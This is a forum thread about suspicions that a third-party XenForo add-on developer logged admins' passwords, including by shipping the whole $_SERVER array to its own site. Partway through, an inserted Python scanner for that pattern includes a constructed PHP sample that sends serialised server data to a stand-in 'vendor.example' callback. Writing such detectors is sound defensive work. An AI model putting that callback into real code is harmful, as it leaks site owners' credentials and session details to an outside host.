******* logging passwords? Just saw this thread over at TAZ

Status
Not open for further replies.
Yes, this is extremely strange. I wonder what they were trying to do with the liveupdate addon.
 
I commented earlier that while Matt was looking through server logs, that IP showed up a lot with LiveUpdate references.

It may be worth checking if there is a vulnerability in that. @Chris D

Doubt there is.

It can be easily explained by the fact that the live update page is polled roughly every 10 seconds for each logged-in user, and for each tab they have open, in fact.

I would be surprised if there weren't a lot of live update references generally for any user, and also there's nothing to be vulnerable. It's just JS which sends an Ajax request which returns a success message. It's actually XF's Ajax system itself which leaks the conversation and alert count.
 
I realized tonight I have an account at *******s, and decided to try to change the email/password to something random; apparently they've disabled the ability to change the registered email... great :p
Then the only solution is to mark all his e-mails as spam :D (y)
If a lot of people do this his reputation will go down further and further.
 
Still can't fathom how they guessed the mod's password on the first try.
I log in to TAZ multiple times a day, so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.
The other explanation is more spooky. I used the same XF password for my development install which had a ******* addon (Advanced Reputation System) on it. The dev install is password protected with a completely different password so it seemed secure enough.
 
I log in to TAZ multiple times a day, so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.
The other explanation is more spooky. I used the same XF password for my development install which had a ******* addon (Advanced Reputation System) on it. The dev install is password protected with a completely different password so it seemed secure enough.

If you had an old ******* add-on that sent the entire server variable, chances are they got the htaccess username and password...

Not saying they would use it though.

Liam
 
The dev install is password protected with a completely different password so it seemed secure enough.
I don't think so.
Quote from @Liam W on TAZ. https://theadminzone.com/threads/do-you-consider-*******-addons-a-security-risk.134246/#post-992215
Their code always used a callback, and they sent the entire $_SERVER array to their site - this includes your IP, as well as any basic authentication (htaccess) details used to access the AdminCP area (which I'm not sure many people are aware of).
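Liam's point in the two posts above (the add-on's callback shipping the whole $_SERVER array off-site) is something you can check for in your own installed add-ons. The script below is an added example, not code from this thread or from any add-on vendor: it scans PHP source for the whole superglobal, or an alias of it, reaching a serialisation call, and reports which Basic-auth related keys a $_SERVER dump would carry. The PHP snippet and the $_SERVER dict are constructed samples; the sink list and key list are my assumptions about what matters.

```python
import re

# PHP calls that flatten an array into a string that can be sent off-site.
SINK_RE = re.compile(
    r"\b(serialize|json_encode|http_build_query|var_export|print_r)"
    r"\s*\(\s*(\$[A-Za-z_]\w*)\s*[,)]"
)
# "$copy = $_SERVER;" aliases the whole array under another name.
ALIAS_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*\$_SERVER\s*;")

# Keys PHP may populate when the AdminCP directory sits behind HTTP Basic auth,
# plus the session cookie and the admin's IP (assumed list of what matters).
SENSITIVE_KEYS = ("PHP_AUTH_USER", "PHP_AUTH_PW", "HTTP_AUTHORIZATION",
                  "HTTP_COOKIE", "REMOTE_ADDR")


def find_server_exfil(php_source):
    """Return [(line_no, text)] for lines that pass the whole $_SERVER array,
    directly or via an alias, into one of the sink calls above.
    Single-key reads such as $_SERVER['HTTP_HOST'] are not flagged."""
    aliases = {"$_SERVER"}
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for m in ALIAS_RE.finditer(line):
            aliases.add(m.group(1))
        for m in SINK_RE.finditer(line):
            if m.group(2) in aliases:
                hits.append((no, line.strip()))
    return hits


def sensitive_keys_present(server):
    """Which of the sensitive keys a dump of this $_SERVER would carry."""
    return [k for k in SENSITIVE_KEYS if k in server]


# Constructed sample of an add-on callback; not real vendor code.
SAMPLE_PHP = """<?php
// Constructed: a 'phone home' callback bundling the environment into the request.
$info = $_SERVER;
$host = $_SERVER['HTTP_HOST'];
$payload = http_build_query(array('host' => $host, 'env' => serialize($info)));
file_get_contents('https://vendor.example/callback?' . $payload);
"""

# Constructed $_SERVER for an admin behind .htaccess Basic auth (dummy values).
SAMPLE_SERVER = {
    "HTTP_HOST": "forum.example", "REMOTE_ADDR": "203.0.113.7",
    "PHP_AUTH_USER": "admin", "PHP_AUTH_PW": "htaccess-secret",
    "HTTP_AUTHORIZATION": "Basic ZHVtbXk=",
}

if __name__ == "__main__":
    for no, text in find_server_exfil(SAMPLE_PHP):
        print(f"line {no}: {text}")
    print("would leak:", sensitive_keys_present(SAMPLE_SERVER))
```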
 
My password at ******* is just a random string of letters, numbers and characters. Completely unique.
However, I have noticed that on May 18th 2015, my account on my forum had been accessed by an IP based in Vietnam. 113.160.6.154 - I do use a LOT of proxies though, so this may not be a breach.
A former admin account had also been accessed by a Vietnamese IP almost a year before as well.

So... it's possible his addons are logging passwords.
 
so the attacker could use up 2 trials between each login. They could have been trying for weeks. That's one explanation.

Lisa said the logs don't show any failed attempts. Maybe you really DID use the same password? That's the only conclusion I can see, unless TAZ has an add-on feeding passwords to an external site, but then you'd think there'd be bigger problems.

There isn't a scenario that I can see in which you have different passwords at different sites, and somebody could gain access without at least one failed attempt.

Even if your session was hijacked, I'm not sure if that could be possible over SSL and XenForo.
 
Lisa said the logs don't show any failed attempts. Maybe you really DID use the same password? That's the only conclusion I can see.

Yeap, I can see it only as one of two conclusions based on what has been said.

a) You used the exact same password and it was decoded or saved into another table as plaintext when you registered.

b) You used a nulled add-on from a pirate site and got keylogged.
 